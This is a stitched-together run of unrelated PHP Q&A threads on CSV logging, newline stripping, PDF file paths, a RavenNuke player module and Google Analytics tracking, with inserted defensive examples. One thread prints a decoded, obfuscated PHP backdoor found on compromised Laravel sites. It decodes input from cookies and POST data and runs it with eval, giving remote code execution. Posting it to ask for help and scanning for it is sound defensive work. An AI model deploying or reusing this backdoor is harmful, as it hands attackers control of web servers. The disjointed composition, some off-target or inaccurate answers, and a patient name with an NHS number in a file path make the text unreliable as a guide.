I have a log routine on my PHP website, that puts data on daily CSV files. Here's the code:
public function generateLogPMWeb($action){
session_start('usuario');
$head_data = "HOSPEDE_CODIGO" . ";" . "RESERVA_CODIGO" . ";" . "HOSPEDE_NOME" . ";" . "HOSPEDE_SOBRENOME" . ";" . "HOSPEDE_EMAIL" . ";" . "RESERVA_DESCRICAOSISTEMA" . ";" . "RESERVA_CODIGOLOCALIZADOR" . ";" . "RESERVA_CODIGOHOTEL" . ";" . "RESERVA_DATARESERVA" . ";" . "RESERVA_DATACHECKIN" . ";" . "RESERVA_DATACHECKOUT" . ";" . "ACAO" . ";\n";
file_put_contents(Config::retorna("document_root", "root").'/logPMWeb/logPMWeb_'.date("Ymd").'.csv', $head_data, FILE_APPEND); // CHANGE HERE
$logPMWeb = $_SESSION['usuario']['id'] . ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_SESSION['usuario']['nome'] . ";" . $_SESSION['usuario']['sobrenome'] . ";" . $_SESSION['usuario']['email'] . ";" . "IC"
. ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_POST['idHotel'] . ";" . date('Y-m-d H:i:s') . ";" . $_SESSION['buscaReserva']['dataInicio'] . ";" . $_SESSION['buscaReserva']['dataFim']
. ";" . preg_replace('/^\s+|\n|\r|\s+$/m', '', $action) . ";\n";
//Save string to log, use FILE_APPEND to append.
file_put_contents(Config::retorna("document_root", "root").'/logPMWeb/logPMWeb_'.date("Ymd").'.csv', $logPMWeb, FILE_APPEND);
}
However I'm getting repeated header lines on my CSV files. I need to have the header only on the first line of the file.
What's the best thing to do?
Use file_exists like below... http://php.net/manual/en/function.file-exists.php
public function generateLogPMWeb($action){
session_start('usuario');
$logfile = Config::retorna("document_root", "root").'/logPMWeb/logPMWeb_'.date("Ymd").'.csv';
$head_data = "HOSPEDE_CODIGO" . ";" . "RESERVA_CODIGO" . ";" . "HOSPEDE_NOME" . ";" . "HOSPEDE_SOBRENOME" . ";" . "HOSPEDE_EMAIL" . ";" . "RESERVA_DESCRICAOSISTEMA" . ";" . "RESERVA_CODIGOLOCALIZADOR" . ";" . "RESERVA_CODIGOHOTEL" . ";" . "RESERVA_DATARESERVA" . ";" . "RESERVA_DATACHECKIN" . ";" . "RESERVA_DATACHECKOUT" . ";" . "ACAO" . ";\n";
if (!file_exists($logfile)) {
file_put_contents($logfile, $head_data, FILE_APPEND); // CHANGE HERE
}
$logPMWeb = $_SESSION['usuario']['id'] . ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_SESSION['usuario']['nome'] . ";" . $_SESSION['usuario']['sobrenome'] . ";" . $_SESSION['usuario']['email'] . ";" . "IC"
. ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_POST['idHotel'] . ";" . date('Y-m-d H:i:s') . ";" . $_SESSION['buscaReserva']['dataInicio'] . ";" . $_SESSION['buscaReserva']['dataFim']
. ";" . preg_replace('/^\s+|\n|\r|\s+$/m', '', $action) . ";\n";
//Save string to log, use FILE_APPEND to append.
file_put_contents($logfile, $logPMWeb, FILE_APPEND);
}
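The file_exists() check can still write the header twice when two requests hit a new daily file at the same moment, and fields joined with ";" break the row layout if a value contains the delimiter or a line break. The following is an added example, not code from the thread: it takes an exclusive lock, writes the header only when the file is empty, and lets fputcsv() do the quoting. appendLogRow(), neutralizeCell() and the sample fields are hypothetical names.

```php
<?php
// Added example (not from the thread); function names and sample rows are hypothetical.

function neutralizeCell(string $value): string
{
    // Collapse line breaks so one event always stays on one row.
    $value = trim(preg_replace('/[\r\n]+/', ' ', $value));
    // Prefix cells that a spreadsheet would evaluate as a formula.
    if ($value !== '' && strpbrk($value[0], "=+-@\t") !== false) {
        $value = "'" . $value;
    }
    return $value;
}

function appendLogRow(string $path, array $header, array $fields): void
{
    $fh = fopen($path, 'c+');            // create if missing, never truncate
    if ($fh === false) {
        throw new RuntimeException("cannot open $path");
    }
    try {
        if (!flock($fh, LOCK_EX)) {      // serialise concurrent requests
            throw new RuntimeException("cannot lock $path");
        }
        fseek($fh, 0, SEEK_END);
        if (ftell($fh) === 0) {          // empty file: this writer owns the header
            fputcsv($fh, $header, ';', '"', '\\');
        }
        fputcsv($fh, array_map('neutralizeCell', $fields), ';', '"', '\\');
        fflush($fh);
        flock($fh, LOCK_UN);
    } finally {
        fclose($fh);
    }
}

// Constructed sample data; the second row carries a ';' and a newline in user input.
$path = sys_get_temp_dir() . '/logPMWeb_' . date('Ymd') . '_demo.csv';
@unlink($path);
$header = ['HOSPEDE_CODIGO', 'HOSPEDE_NOME', 'RESERVA_CODIGOHOTEL', 'ACAO'];
appendLogRow($path, $header, ['17', 'Ana', '42', 'search']);
appendLogRow($path, $header, ['18', "Rui;x\n=1+1", '42', 'book']);
echo file_get_contents($path);
```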
I have the following string (using $_POST). How do I remove all the newlines and spaces and make it an absolute single line?
Physical Address. . . . . . . . . : E8-6A-64-DE-48-60
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8F
Physical Address. . . . . . . . . : 06-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-92
Not always stable?
$request= mysql_real_escape_string(trim($_POST['request']));
$request_sql =str_replace("\r\n",'', $request);
$request_sql = str_replace("\\r\\n",'', $request_sql);
echo $request_sql;
trim only strips spaces at end and start of the string and you should strip \r and \n individually.
try this:
$request= mysql_real_escape_string($_POST['request']);
$request_sql =str_replace("\n",'', $request);
$request_sql = str_replace("\r",'', $request_sql);
$request_sql = str_replace(" ",'', $request_sql);
echo $request_sql;
Try using regex.
$request = $_POST['request'];
//Remove all characters that are not A-Z, a-z, 0-9 or '.', ':' or '-'
$request_sql = preg_replace("/[^A-Za-z0-9.:-]/", '', $request );
try:
$str = 'Physical Address. . . . . . . . . : E8-6A-64-DE-48-60
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8F
Physical Address. . . . . . . . . : 06-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-92';
echo str_replace(" \n", '', $str);
Output:
Physical Address. . . . . . . . . : E8-6A-64-DE-48-60Physical Address. . . . . . . . . : 04-EA-56-08-E6-8FPhysical Address. . . . . . . . . : 06-EA-56-08-E6-8EPhysical Address. . . . . . . . . : 04-EA-56-08-E6-8EPhysical Address. . . . . . . . . : 04-EA-56-08-E6-92
After replacing the \n you can use mysql escape string to avoid sql injection.
The problem with your code is that mysql_real_escape_string will not only escape ' and " but it will escape other characters like \n and \r which you want to remove.
It will replace new line characters with a backslash character followed by l characters
so removing newlines, carriage return after they have been escaped will result in a string with extra backslashes \ and n and r characters.
Check out this
<?php
$originalString =
"Line1
Line2
";
// CASE 1 WRONG RESULT
$string1 = mysqli_real_escape_string($con, $originalString);
$string1 = str_replace("\n", '', $string1);
echo "escape then replace result \n";
echo $string1 . "\n";
//CASE 2 EXPECTED RESULT
$string2 = str_replace("\n", '', $originalString);
$string2 = mysqli_real_escape_string($con, $string2);
echo "replace then escape result \n";
echo $string2 . "\n";
this will output
escape then replace result
Line1\nLine2\n
replace then escape result
Line1Line2
So to correct your code
$request_sql =str_replace(["\n", "\r", " "],'', $_POST['request']);
$request= mysql_real_escape_string($request_sql);
echo $request_sql;
Please don't use mysql_real_escape_string; instead use prepared statements. Here is an answer for how to switch to them. They will make your life much easier and safer.
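The same flow with a prepared statement, as an added example that is not part of the original answers: the whitespace is stripped first and the value is then passed as a bound parameter, so no escaping step exists to get out of order. An in-memory SQLite database (via PDO) stands in for the MySQL server so the script runs offline; the table, column and function names are hypothetical.

```php
<?php
// Added example (not from the thread). Table, column and function names are hypothetical;
// an in-memory SQLite database stands in for the MySQL server.

function normalizeRequest(string $raw): string
{
    // Remove every whitespace character (spaces, tabs, \r, \n) in one pass.
    return preg_replace('/\s+/', '', $raw);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE requests (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

// Constructed input standing in for $_POST['request']: CRLF line ends plus a quote.
$raw = "Physical Address. . . : E8-6A-64-DE-48-60\r\n"
     . "Physical Address. . . : 04-EA-56-08-E6-8F\r\n"
     . "owner: O'Brien\r\n";

$clean = normalizeRequest($raw);

// The value travels as a bound parameter, so it is never parsed as SQL
// and the quote needs no backslash.
$stmt = $pdo->prepare('INSERT INTO requests (body) VALUES (:body)');
$stmt->execute([':body' => $clean]);

$stored = $pdo->query('SELECT body FROM requests')->fetchColumn();

var_dump($stored === $clean);                    // stored value is byte-identical
var_dump(strpbrk($stored, "\r\n ") === false);   // no whitespace survived
var_dump(strpos($stored, '\\') === false);       // no stray backslashes were added
```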
For a customer I am maintaining a small group of websites built in PHP Laravel. Lately while working on these I have discovered a couple of new suspicious looking files, which suddenly appeared on two of the websites' FTP servers. The files are not originally a part of the codebase, and I have no idea where they're coming from all of a sudden. There are three files in total, named b3lo5x3x.php, cache.php and plugin.php and they are located in the root directory of the websites.
The content of the files looks pretty disturbing. When decoded on unphp.net I get the following result, which is the exact same for all three files. The size of all three files is also the same.
<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
function dgubnv($fvgiv, $lfpfzw, $nclll) {
return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
}
function oocfo($fvgiv, $elasr) {
return #$fvgiv[9]($fvgiv[1], $elasr);
}
function yiugt($fvgiv, $elasr) {
$vezpr = $fvgiv[3]($elasr) % 3;
if (!$vezpr) {
eval($elasr[1]($elasr[2]));
exit();
}
}
$wqudv = oocfo($fvgiv, $wqudv);
yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>
Does anyone know what this can be? Can it be that the FTP servers are infected with some kind of malware or hacking tools?
Wipe the machines affected completely. You need to reinstall the Laravel project(s) to a new clean machine. You also should audit them and any other software used if possible.
Make sure that all of the software on the server is updated too. Most likely you were compromised through a non updated software with a known vulnerability.
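For the audit step, the traits visible in the decoded file (function names spelled by indexing a string character by character, calls made through array elements, eval(), input read from $_COOKIE and $_POST) and the fact that the same content appeared under three names can drive a first pass over a web root. This is an added example, not code from the thread; the function names, the regular expressions and the hit threshold are assumptions, and the sample files are constructed and inert.

```php
<?php
// Added example (not from the thread). Names, patterns and threshold are hypothetical.

function scanPhpFiles(string $root): array
{
    $traits = [
        'eval'             => '/\beval\s*\(/i',
        'variable call'    => '/\$\w+\s*(\[[^\]]+\])+\s*\(/',   // $a[7](...)
        'request input'    => '/\$_(COOKIE|POST|REQUEST|GET)\b/',
        'char-index chain' => '/(\$\w+\[\d+\]\s*\.\s*){5,}/',   // $s[18] . $s[11] . ...
    ];
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile() || strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $code = file_get_contents($file->getPathname());
        $hits = [];
        foreach ($traits as $name => $re) {
            if (preg_match($re, $code)) {
                $hits[] = $name;
            }
        }
        $report[$file->getPathname()] = ['sha256' => hash('sha256', $code), 'hits' => $hits];
    }
    return $report;
}

function suspicious(array $report, int $minHits = 3): array
{
    // Identical content under several names is itself a signal worth reviewing.
    $copies = array_count_values(array_column($report, 'sha256'));
    return array_filter($report, fn ($r) =>
        count($r['hits']) >= $minHits || ($copies[$r['sha256']] > 1 && $r['hits'] !== []));
}

// Constructed, inert samples: the traits sit inside a PHP comment and never execute.
$dir = sys_get_temp_dir() . '/scan_demo_' . getmypid();
@mkdir($dir);
$inert = '<?php /* $s[1] . $s[2] . $s[3] . $s[4] . $s[5] . $s[6]; $f[7]($_COOKIE, $_POST); eval($e[1]($e[2])); */';
file_put_contents("$dir/cache.php", $inert);
file_put_contents("$dir/plugin.php", $inert);
file_put_contents("$dir/index.php", '<?php echo "hello";');
print_r(array_keys(suspicious(scanPhpFiles($dir))));
```

A pattern scan only narrows the review; comparing the deployed tree against the repository's tracked files is the check that shows which files were never part of the codebase.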
Few examples I've tried
// Worked
fopen($OutputFolderPath."Text.pdf", "w");
// Didn't work
$pdf->Output($OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf','F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','F'
// Works with no PDF content inside
fopen($OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf','F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','w');
// Worked
$pdf->Output('C:/ISOSEC/PDFS/' . ReplaceWindowsFileNameSpecialCharacters($Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf'),'F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','F'
I'm trying to use the $OutputFolderPath
'$OutputFolderPath' Path:
//MIA-Test/htdocs/SharedFolder/MIA - Digital Post Natal Records/
Error:
fopen(file:////MIA-Test/htdocs/SharedFolder/MIA - Digital Post Natal Records/Fiona Appleton_1946546288 09_06_2015.pdf): failed to open stream: No such file or directory
Use this :
$a = file_get_contents('Text.pdf');
file_put_contents('new_text.pdf', $a);
I'm fighting with this module since yesterday. Documentation is poor or there is something I am doing wrong.
This is the link from the original html files.
www.bestbuildpc.org/Html5_Player/index.html
This is the link for the documentation
www.bestbuildpc.org/Html5_Player/readme/index.html
I converted to a module in order to work in Ravennuke(based on phpnuke)
This is the link where the module is not loading properly.
http://www.bestbuildpc.org/modules.php?name=HTML5_Player
<?php
if (!defined('MODULE_FILE')) die('You can\'t access this file directly...');
if (!defined('PHP_EOL')) define('PHP_EOL', strtoupper(substr(PHP_OS,0,3) == 'WIN') ? "\r\n" : "\n");
require_once 'mainfile.php';
$module_name = basename(dirname(__FILE__));
$pagetitle = '- ' . $module_name . '';
$index = 0;
if (!defined('INDEX_FILE')) define('INDEX_FILE', true); // Set to FALSE to hide right blocks
if (defined('INDEX_FILE') AND INDEX_FILE === true) {
// auto set right blocks for pre patch 3.1 compatibility
$index = 1;
}
$ThemeSel = get_theme(true);
$html5player = 'themes/' . $ThemeSel . '/css/normalize.css';
if (file_exists($html5player)) {
define('RN_MODULE_CSS', 'normalize.css');
} else {
$html5player = 'modules/' . $module_name . '/css/normalize.css';
addCSSToHead($html5player, 'file');
addCSSToHead('modules/' . $module_name . '/mediaelement/mediaelementplayer.min.css', 'file');
// addJSToHead('modules/' . $module_name . '/js/jquery-1.11.1.min.js', 'file');//I have another version loading
//echo '<script type="text/javascript">!window.jQuery && document.write(\'<script src="modules/HTML5_Player/js/jquery-1.11.1.min.js"><\/script>\')</script>' . PHP_EOL;
//echo '<script type="text/javascript">window.jQuery && document.write(\'<script src="includes/jquery/jquery.js"><\/script>\')</script>' . PHP_EOL;
addJSToBody('modules/' . $module_name . '/mediaelement/mediaelement-and-player.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery-ui-1.11.1.sortable.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery.ui.touch-punch-improved.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery.hammer-full.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/perfect-scrollbar-with-mousewheel.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery.vimuse.min.js', 'file');
$JStoHeadHTML = '
<script type="text/javascript">' . PHP_EOL
// . '$(window).load(function(){' . PHP_EOL
. '$(document).ready(function(){' . PHP_EOL
. '$(\'#player\').vimuse()({' . PHP_EOL
. 'mediaType: \'audio\',' . PHP_EOL
. 'showPlaylistOnLoad: true,' . PHP_EOL
. 'autoplay: true,' . PHP_EOL
. 'shuffle: true,' . PHP_EOL
. 'showPlaylistOnLoad: true,' . PHP_EOL
. 'playlistProgress: true,' . PHP_EOL
. 'showFileTypeIcons: true,' . PHP_EOL
. 'showDeleteButtons: true,' . PHP_EOL
. 'showItemDuration: true,' . PHP_EOL
. 'enablePlaylistSort: true,' . PHP_EOL
. 'showAudioDetails: true,' . PHP_EOL
. 'showAudioCover: true,' . PHP_EOL
. 'showAuxControls: true,' . PHP_EOL
. 'playlistProgress: true,' . PHP_EOL
. 'stopPlaybackOnPageHide: false,' . PHP_EOL
. 'showDownloadLinks: false,' . PHP_EOL
. 'scanMP3Folder: true,' . PHP_EOL
. 'mp3Folder: \'media/audio\'' . PHP_EOL
. '});' . PHP_EOL
. '});' . PHP_EOL
. '</script>' . PHP_EOL;
addJSToBody($JStoHeadHTML, 'inline');
}
include_once 'header.php';
OpenTable();
echo '<div class="text-center">' , PHP_EOL
, '<div class="header-content">' , PHP_EOL
, '<h1>HTML5 Media Player</h1>' , PHP_EOL
, '</div></div>' , PHP_EOL
, '<div class="main">' , PHP_EOL
, '<div id="player">' , PHP_EOL
, '</div></div>' , PHP_EOL;
CloseTable();
include_once 'footer.php';
What am I doing wrong? The module is not working. I need an example from the same files. I've been reading and testing lots of ways to load jQuery but I don't have any more ideas about what is going on. It would be nice if someone took a look at it. Thanks in advance.
I am using the following script to send data from a form to google analytics:
if ($result){
$var_utmac = 'UA-0000000-0';
$var_utmhn = 'my-site.com'; // domain
$var_utmn = rand(1000000000,9999999999); // random number
$var_cookie = rand(10000000,99999999); //random cookie number
$var_random = rand(1000000000,2147483647); //number under 2147483647
$var_today = time();
$var_referer = $_SERVER['HTTP_REFERER']; //referer url
if ($var_referer == '') { $var_referer = '-'; }
$var_uservar='-'; // no user-defined
$var_utmp= $_POST['REQUEST_URI'].'data_'. htmlentities($_POST['dataone']).'_'.htmlentities($_POST['datatwo']); // folder called no_jstracker to segment nojavascript visitors
$urchinUrl='http://www.google-analytics.com/__utm.gif?utmwv=3&utmn=' . $var_utmn . '&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' . $var_utmhn . '&utmhid=' . $var_utmn . '&utmr=' . $var_referer . '&utmp=' . $var_utmp . '&utmac=' . $var_utmac . '&utmcc=__utma%3D' . $var_cookie . '.' . $var_random . '.' . $var_today . '.' . $var_today . '.' . $var_today . '.2%3B%2B__utmz%3D' . $var_cookie . '.' . $var_today . '.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D_CAMPAIGN_%7Cutmcmd%3D_MEDIUM_%7Cutmctr%3D_KEYWORD_%7Cutmcct%3D_CONTENT_%3B%2B__utmv%3D' . $var_cookie . '.' . $var_uservar . '%3B';
echo ' <img src="' . $urchinUrl . '" border="0" />';
}
While the data is being sent successfully, there is one issue: analytics doesn't show some of the data correctly, i.e. for campaign data it just shows "CAMPAIGN" and for keyword it shows "KEYWORD". It is clear where this happens in the script but I am not sure how to fix it. Ideally of course analytics should populate that with its own data.
Any suggestions whether this is even possible?
I think this happens because you hard-coded the "CAMPAIGN" value. Instead of that, assign a value for the campaign.
$CAMPAIGN='facebook';
$KEYWORD='testing';
$urchinUrl='http://www.google-analytics.com/__utm.gif?utmwv=3&utmn=' . $var_utmn . '&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' . $var_utmhn . '&utmhid=' . $var_utmn . '&utmr=' . $var_referer . '&utmp=' . $var_utmp . '&utmac=' . $var_utmac . '&utmcc=__utma%3D' . $var_cookie . '.' . $var_random . '.' . $var_today . '.' . $var_today . '.' . $var_today . '.2%3B%2B__utmz%3D' . $var_cookie . '.' . $var_today . '.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D'.$CAMPAIGN.'%7Cutmcmd%3D_MEDIUM_%7Cutmctr%3D'.$KEYWORD.'%7Cutmcct%3D_CONTENT_%3B%2B__utmv%3D' . $var_cookie . '.' . $var_uservar . '%3B';
for more details about Google Analytics Cookies